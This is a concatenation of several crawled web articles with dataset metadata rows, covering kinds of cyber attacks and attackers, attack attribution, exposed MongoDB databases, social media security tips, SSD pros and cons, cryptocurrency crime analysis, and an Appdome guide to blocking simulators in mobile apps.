Email is big business. Even today, most marketers consider an email list to be the best money maker out there, more so than social media networks or raw internet traffic on their site. Some unethical marketers (sometimes known as blackhat marketers) bypass the process of building a legitimate email list by buying or renting one, and then just blast the users with promotional emails they never signed up for. Spam also happens to be the top source for malware infections and phishing campaigns. It’s really easy for a spammer to target his emails to a certain country and find an email service. Here’s a more in-depth look on how spam operations function and why they won’t go away any time soon.
Hate speech/cyber bullying
Some forms of abusive content center around spreading fear, and stoking violence. Racist speech, homophobia, religious fundamentalism are all forms of hate speech, since they incite the reader to do what he otherwise wouldn’t do. Abusive content spreads through many channels: email, blogs, social media accounts even advertising in some cases. Cyber bullying fits in the same category, where the attacker seeks to humiliate the victim, blackmailing them, or picking on their defects. Cyberbullying has a real impact on the victims, with numerous stories of people driven to suicide.
Child pornography and other types of violent or sexually explicit content
One of the main reasons why the dark web exists is to spread and sell content that is otherwise illegal. Child pornography is probably on top of the list, alongside graphic videos depicting other violent acts.
Who are the people committing cyber attacks?
The vast majority of cybercriminal groups launch cyber attacks in order to make money. But, there are other groups out there who aren’t interested in money-making.
State sponsored hacks
In the constant fight for geopolitical power, cyber-attacks are a favorite tool in a nation’s arsenal. Hacking another country is a cleaner and more quiet process than sending in tanks and soldiers, while still giving tangible results. One of the most high-profile such state-sponsored hacks is the Stuxnet worm we talked about earlier. Nobody managed to conclusively identify the source of the infection, but most analysts claim the United States and Israel created Stuxnet as a joint effort.
Some hackers aren’t interested in money, nor do they work for governments. Instead, they seek to advance a social cause or mission, and are not ashamed to hack into governments or organizations they deem to be standing in the way. These causes vary from group to group. Most hacktivist groups claim to protect free speech, democracy and transparency. One of the most well-known hacker groups out there is Anonymous, a loosely organized organization that has protested against tougher copyright laws, child pornography and various corporations.
The biggest group of malicious hackers by far. Cybercriminals seek to make a quick buck by using any of the malicious methods mentioned above. Usually, a cybercriminal will specialize, such as spam messages, phishing, login attacks and so on. Another thing to take into account is that malicious hackers don’t really operate as lone wolves. There is an entire so-called “malware economy”, where cybercriminals trade and sell hacking tools, leaked email databases, phone numbers, and even DDoS as a service.
The Internet has spurred a huge wave of innovation and has made all of our lives so much more easier. Unfortunately, criminals have oftentimes innovated at the same speed, or even faster, coming up with newer and more powerful ways to take away your hard-earned cash, or control your information. Fortunately, there’s a lot you can do to avoid these attacks.
INSTALL IT, FORGET IT AND BE PROTECTEDDownload Heimdal™ FREE | <urn:uuid:40e05f6a-5da8-444e-a76c-52a39b7b0091> | CC-MAIN-2022-40 | https://heimdalsecurity.com/blog/cyber-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333455.97/warc/CC-MAIN-20220924182740-20220924212740-00516.warc.gz | en | 0.925629 | 7,373 | 2.890625 | 3 |
Attribution in the cybersecurity world refers to the process of tracking, identifying and placing blame on the hacker (perpetrator) or organization behind an attack. Following an attack, an organization should conduct an investigation to attribute the incident to specific threat actors to gain a detailed understanding of the attack, what the motivation behind the attack was, and possibly bring the hacker(s) to account.
Unfortunately, It is often difficult to impossible to track down who the perpetrator was in an attack, considering all of the avenues hackers can take to cover their tracks.
Additionally, increasingly sophisticated hackers are employing an approach known as “false flags” to hide their tracks. In this method of obfuscation, the hacker leaves evidence from other nation states, hacker groups, or languages behind in their attacks. This can be source code stolen from those other hacker groups, or it can be small language snippets they have used previously in their malware code. The purpose of a false flag is to leads investigators into incorrect conclusions about the source of an attacker or hacking group. | <urn:uuid:f85977df-6ad3-47e9-a937-5e7f1eafd8eb> | CC-MAIN-2022-40 | https://cyberhoot.com/cybrary/attribution/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00516.warc.gz | en | 0.952289 | 215 | 3.390625 | 3 |
According to the John Matherly, the creator of Shodan, reveals that nearly 595.2 terabytes of the data were exposed by using outdated or unlatched version of the software. All the details can be easily accessed without any authentication.
MongoDB is a popular NoSQL database, alternative to SQL, an open source software, many companies already use it, including “The New York Times”, “Ebay”, and “Foursquare.” John Matherly argues that around 30.000 databases are exposed because administrators are using old versions of MongoDB, and these old versions fail to bind to localhost.
This security issue were already know, as a security researchers Roman Shtylman, had reported the issues in 2012. Shtylman realized that a critical bug because MongoDB was being shipped without authentication.
This is not the first time that the security industry is concerned by the security of MongoDB, in February 2015 nearly 40,000 entities running MongoDB were found vulnerable to cyber attacks. | <urn:uuid:72600047-215b-4895-a698-569807c7eaa2> | CC-MAIN-2022-40 | https://www.cyberkendra.com/2015/07/mongodb-flaws-exposed-600tb-admin-data.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00516.warc.gz | en | 0.968159 | 218 | 2.609375 | 3 |
Do you find yourself checking social media more than ever to pass the time? You’re not alone. According to App Annie—the company setting the standard for mobile data and analytics—all social apps have reported increased engagement as users look for ways to stay connected with the outside world.
App Annie adds that people spent 20 percent more time in apps in Q1 of 2020 compared to last year, largely due to the COVID-19 lockdown. Experts foresee these numbers continuing to increase as governments across the word implement more stringent social distancing measures.
The app holding steady at the top of the downloads chart is TikTok, followed by WhatsApp Messenger, Facebook, and Instagram.
Unfortunately, with an increase in time spent online, there is a heightened risk of cybersecurity scams. Here are five quick tips you can implement in minutes to protect your personal information, specifically when using social media apps:
- Update your password often, and make sure it’s something STRONG. Create a password that includes numbers, uppercase and lowercase letters, and special characters. And be sure you’re not using the same password across multiple social media accounts. That just makes a hacker’s life easier! BARR recommends using a password manager, like LastPass, if you can.
- Review your privacy settings. Take a few minutes to explore how you can limit your audience, set updated security questions and answers, and just go over the who, what, where settings. The tighter your privacy controls are, the smaller the chance of having your personal information hacked.
- Use multi-factor authentication. This adds an extra barrier between you and hungry cybercriminals. Enabling this is easy, and all it means is that you’ll be sent a unique code via a secondary channel (text, email, etc.) to input when logging into your social media account.
- Be careful when clicking on links in your social media messaging apps. Often, cybercriminals create phishing scams where they send messages from someone you’d expect to get a message from. You click the link and, boom, they have your info. Confirm the person sending you the message or friend/follow request is who they say they are, and not a hacker who has recreated their account so it looks familiar to you.
- Log off when you’re done. Easy, but important, especially when accessing social media accounts on unfamiliar or shared devices.
If you’re new to TikTok, this article shares the best settings for protecting your profile from hackers.
Questions about data protection or how your organization can strengthen its cybersecurity defense efforts? Contact us for a quick consultation. | <urn:uuid:e2587a06-f31a-49e8-9caf-c055531167c4> | CC-MAIN-2022-40 | https://www.barradvisory.com/blog/social-media-data-protection/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00716.warc.gz | en | 0.895211 | 548 | 2.578125 | 3 |
A solid-state drive (SSD) is one of the most popular, fastest, and energy-efficient solutions for…
Since their inception in the 1990s, solid-state drives (SSDs) have emerged as one of the 21st century’s top digital storage solutions. These drives are now vying with the older and more established hard disk drive (HDD) for market dominance and consumer preference.
HDDs and SSDs are similar because both are designed to provide storage for laptops, desktops, and other everyday tech gadgets. These drives are where we store personal and business documents, photos, videos, and all other digital files. But unlike HDDs that use mechanical parts to read and write data to platters, SSDs use flash memory to save information.
SSDs read and write data to interconnected flash-memory chips. These chips are unique because they can hold data, even when power isn’t flowing through them. The lack of mechanical components means that SSDs are pretty small, making them ideal for laptops and other devices. Naturally, as demand for portable tech has increased, so too has the need for SSDs.
In 2020, 320 million SSDs were shipped across the globe. This device’s market share has more than tripled between 2015 and 2020, and the industry expects shipments to increase by 13% in 2021. In 2020, for the first time, more SSDs were shipped than HDDs.
There’s a reason SSDs are overtaking HDDs. When you’re considering the pros and cons of SSD vs. HDD, you might assume the advantages of SSD outweigh the drawbacks. But that’s not necessarily true for everyone. This list of SSD pros and cons will help you determine if an SSD is the proper storage solution for you.
Benefits of SSD
There are several pros and cons of solid-state drives. But for most, the advantages of using an SSD make the drawbacks worth it. Here are three of the top benefits of an SSD.
Fast read and write speeds
SSDs read and write faster than HDDs. A typical SSD can read at about 550 megabytes per second (MBps) and write at 520 MBps in normal conditions. On the other hand, an HDD can only read and write at 125MBps—more than four times slower than the SSD. Just looking at the numbers, you can see their performance is vastly different.
No moving parts
As we discussed before, HDDs have mechanical parts to read and write data to the disc manually. These moving parts cause most hard drive issues, which often result in data loss. SSDs have no mechanization and, as a result, are far less likely to fail.
But the lack of moving parts has an added benefit: no noise. The sound of an HDD humming is a universally familiar noise. But since SSDs have no moving parts, they make no sound.
That absence of moving parts in an SSD means a much smaller design than their HDD predecessors. HDDs have motors, spindles and platters, all of which take up a lot of space. The chips comprising the SSD are thin and flat, just like the SSDs.
As devices needing storage get smaller, their hard drives need to as well. SSDs are slowly shrinking and, because of their composition, could continue to reduce in size.
Drawbacks of SSD
There’s much to consider before buying a hard drive, which is why understanding solid state drives pros and cons is so essential. And while there are many benefits of SSDs, there are SSD cons, as well.
Limited life span
Every SSD has a specific amount of times it can be read or written. This is called terabytes written (TBW). When you buy an SSD, the device comes with a predetermined “time of death,” which is impacted by how frequently you use the drive.
This may seem strange. But in actuality, these TBW limits are way more than the number of reads and writes performed by an average user. A recent study done by Google and the University of Toronto found that most SSDs fail due to age, not because they reached the TBW limit.
SSDs cost far more than their HDD counterparts. Usually, for comparable storage capacity, you’ll pay double for an SSD than for an HDD. The high cost is an SSD con, but depending on how you plan to use the drive, the price might be an investment worth making.
Difficult data recovery
Despite the cons of SSD, you might conclude that SSD is superior to HDD. But this is a tough argument to make when it comes to data recovery. Recovering data from SSDs is far more complex than from HDDs. Attempting to fix an SSD while preserving data is no small feat and should never be attempted on your own. If you have a falling SSD and need help recovering your data, we can help. Contact DriveSavers to save the information on your SSD! | <urn:uuid:0f51ed1d-dda7-48d2-abb5-0c4ff0d30b6b> | CC-MAIN-2022-40 | https://drivesaversdatarecovery.com/pros-and-cons-of-solid-state-drives-ssds/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00716.warc.gz | en | 0.95279 | 1,032 | 2.765625 | 3 |
Cryptocurrency’s decentralized, semi-anonymous nature makes it a uniquely appealing option for criminals. But unlike traditional forms of value transfer, cryptocurrency is inherently transparent in a publicly visible ledger, Kimberly Grauer, head of research at Chainanalysis, explained.
With the right tools, such as blockchain analysis, defenders can gain unprecedented insight into criminal activity and the latest trends in crypto crime, she explained at the MIT Tech Review conference Cyber Secure.
“I’ve always had this lingering thought that cryptocurrency is an amazing tool for privacy, and you can transact anonymously, and so criminals are using it. There’s also the narrative that this technology enables transparency that has never been seen before. How are both of these things true at the same time? How is this the most private and the most transparent technology?” she said.
Both can be true at the same time, Grauer added.
Researchers were able to associate cryptocurrency addresses with services that fall under certain categories. Most cryptocurrency value is transferred through services, such as darknet markets, child abuse materials, stolen crypto, scams, sanctions, gambling sites, retain exchangers, and others.
The researchers were also able to intersect this data with geography and make a cryptocurrency adoption index.
“We see cryptocurrency in countries where there's instability - countries like Venezuela or Kenya. And places where people are extremely digitally native, like Russia and Ukraine. There’s a lot of adoption of cryptocurrency in startups that are using cryptocurrency. We also see huge amounts of trading in China and the US,” Grauer said.
Their data also can help answer the question of why bitcoin is going up lately. Last week, it rose above $19,783 – the previous record it reached in December 2017. And this year, the price is driven by different factors than in 2017.
“There are fewer retail investments that are just entering the market for the first time in small amounts. We see much larger transfers that are being sent to North American services. We’ve heard a lot about institutional investors coming in and being responsible for this more sustained growth,” she said.
Cryptocurrency analysis also helps to paint a clearer picture of how much people are using cryptocurrency to engage in illicit activities. In 2019, around 1% of all the cryptocurrency transfers were associated with illicit activity.
“For some people, it’s low, and for others - it’s high, and it depends on what you think about cryptocurrency space. In total, it’s $11.5 billion in criminal activity. We can see that a lot of that last year was driven by scams, Ponzi schemes as there’s still a lot of feelings that you can get rich with cryptocurrency. Also, there’s a broader audience than ever because there’s a lot of user-friendly technologies which made 2019 a rife year for criminal activity,” Grauer said.
This year, according to Grauer, will be dubbed the year of ransomware as researchers saw a 10x increase in ransom payments.
“We’re able to see criminals evolving in real-time because of the technology that blockchain has allowed. Last year, criminals were choosing two major off-ramps, called Binance and Huobi. Over 50% off all the stolen, darknet, ransom money that was winding up at those two services,” she said.
Researchers were also able to identify how many cryptocurrency deposit addresses were receiving money from illicit activities.
“In this case, we can see that a handful of deposit addresses were receiving most of those funds. There’s something institutional happening here. There’s something structural happening here, and we hypothesize that this has a lot to do with OTC (over-the-counter) brokers,” Grauer said.
So the paradox of cryptocurrency, according to her, is that people behind these activities stay anonymous. Yet, at the same time, “we can have a strong sense of what’s going on from the macro perspective.” | <urn:uuid:68bb07c9-f2bd-480a-93d7-9f3e268cfd43> | CC-MAIN-2022-40 | https://cybernews.com/security/11-5-billion-in-cryptocurrency-associated-with-illicit-activity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00716.warc.gz | en | 0.967614 | 845 | 2.546875 | 3 |
How to Block Simulators in Android & IOS Apps
Learn to Prevent Simulation in Mobile apps, in mobile CI/CD with a Data-Driven DevSecOps™ build system.
What is Simulation?
Simulators are virtualized tools that are used to run software tests on mobile apps inside flexible, software-defined environments. Hackers use simulators for malicious purposes as part of dynamic analysis efforts, where they run your mobile app in their own controlled environment to learn how your app behaves and interacts with other components or systems while it’s running.
Why Prevent Simulation in Mobile Apps ?
Hackers use simulators to run mobile apps within their own controlled environment so they can mimic, observe, and study how a mobile app functions and behaves while the app is running. This lets them know how a mobile app behaves to help hackers build more effective attacks and attack methods.
For example, using simulators, hackers can observe how an app interacts with the mobile operating system, or study the methods and sequence by which the app connects to and authenticates with its backend. Simulators can also be used to observe how an application app reads/writes to the filesystem (for instance to learn if weak encryption is used, or no encryption at all).
Preventing Simulation on Mobile apps by Using Appdome
On Appdome, follow these 3 simple steps to create self-defending Mobile Apps that Prevent Simulation without an SDK or gateway:
Upload the Mobile App to Appdome.
Upload an app to Appdome’s Mobile App Security Build System
Upload Method: Appdome Console or DEV-API
Mobile App Formats: .ipa For iOS device or .apk or .aab
Build the Protection: Prevent Running on Simulators.
Congratulations! The Prevent Running on Simulators protection is now added to the mobile app
Building Prevent Running on Simulators by using Appdome’s DEV-API:
Create and name the Fusion Set (security template) that will contain the Prevent Running on Simulators feature as shown below:
Follow the steps in Sections 2.2.1-2.2.2 of this article, Building the Prevent Running on Simulators feature via Appdome Console, to add the Prevent Running on Simulators feature to this Fusion Set.
Open the Fusion Set Detail Summary by clicking the “...” symbol on the far-right corner of the Fusion Set, as shown in Figure 1 above, and get the Fusion Set ID from the Fusion Set Detail Summary (as shown below):
Figure 2: Fusion Set Detail Summary
Note: Annotating the Fusion Set to identify the protection(s) selected is optional only (not mandatory).
Follow the instructions below to use the Fusion Set ID inside any standard mobile DevOps or CI/CD toolkit like Bitrise, App Center, Jenkins, Travis, Team City, Cirlce CI or other system:
Figure 1: Fusion Set that will contain the Prevent Running on Simulators feature
Note: Naming the Fusion Set to correspond to the protection(s) selected is for illustration purposes only (not required).
Building the Prevent Running on Simulators feature via Appdome Console
To build the Prevent Running on Simulators protection by using Appdome Console, follow the instructions below.
Where: Inside the Appdome Console, go to Build > Security Tab > ONEShield™ section . Like all other options in ONEShield™, Simulation is turned on by default, as shown below:
Figure 3: Prevent Simulation option
Note: The App Compromise Notification contains an easy to follow default remediation path for the mobile app end user. You can customize this message as required to achieve brand specific support, workflow or other messaging.
When you select the Prevent Running on Simulators you'll notice that your Fusion Set you created in step 2.1.1 now bears the icon of the protection category that contains Prevent Running on Simulators
Figure 4: Fusion Set that displays the newly added Prevent Running on Simulators protection
Click Build My App at the bottom of the Build Workflow (shown in Figure 3).
Certify the Prevent Running on Simulators feature in Mobile Apps.
After building Prevent Running on Simulators, Appdome generates a Certified Secure™ certificate to guarantee that the Prevent Running on Simulators protection has been added and is protecting the app. To verify that the Prevent Running on Simulators protection has been added to the mobile app, locate the protection in the Certified Secure™ certificate as shown below:
Figure 5: Certified Secure™ certificate
Each Certified Secure™ certificate provides DevOps and DevSecOps organizations the entire workflow summary, audit trail of each build, and proof of protection that Prevent Running on Simulators has been added to each Mobile app. Certified Secure provides instant and in-line DevSecOps compliance certification that Prevent Running on Simulators and other mobile app security features are in each build of the mobile app
Prerequisites to Using Prevent Running on Simulators:
To use Appdome’s mobile app security build system to Prevent Simulation , you’ll need:
- Appdome account (create a free Appdome account here)
- A license for Prevent Running on Simulators
- Mobile App (.ipa For iOS device or .apk or .aab For Mobile)
- Signing Credentials (see Signing Secure iOS and Android apps)
Using Appdome, there are no development or coding prerequisites to build secured Apps by using Prevent Running on Simulators. There is no SDK and no library to code or implement in the app and no gateway to deploy in your network. All protections are built into each app and the resulting app is self-defending and self-protecting.
Releasing and Publishing Mobile Apps with Prevent Running on Simulators
After successfully securing your app by using Appdome, there are several available options to complete your project, depending on your app lifecycle or workflow. These include:
- Customizing, Configuring & Branding Secure Mobile Apps
- Deploying/Publishing Secure mobile apps to Public or Private app stores
- Releasing Secured Android & iOS Apps built on Appdome.
All apps protected by Appdome are fully compatible with any public app store, including Apple App Store, Google Play, Huawei App Gallery and more.
Protections Similar to Prevent Running on Simulators
Here are a few related resources:
To learn all of the security features included in Appdome ONEShield, visit the OneShield Knowledge Base article.
If you have any questions, please send them our way at support.appdome.com or via the chat window on the Appdome platform.
Thanks for visiting Appdome! Our mission is to secure every app on the planet by making mobile app security easy. We hope we’re living up to the mission with your project. | <urn:uuid:87f9b291-c007-4427-a4ce-3250c24ba518> | CC-MAIN-2022-40 | https://www.appdome.com/how-to/mobile-app-security/mobile-rasp-security/block-simulators-in-android-ios-apps/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00716.warc.gz | en | 0.84443 | 1,473 | 2.65625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.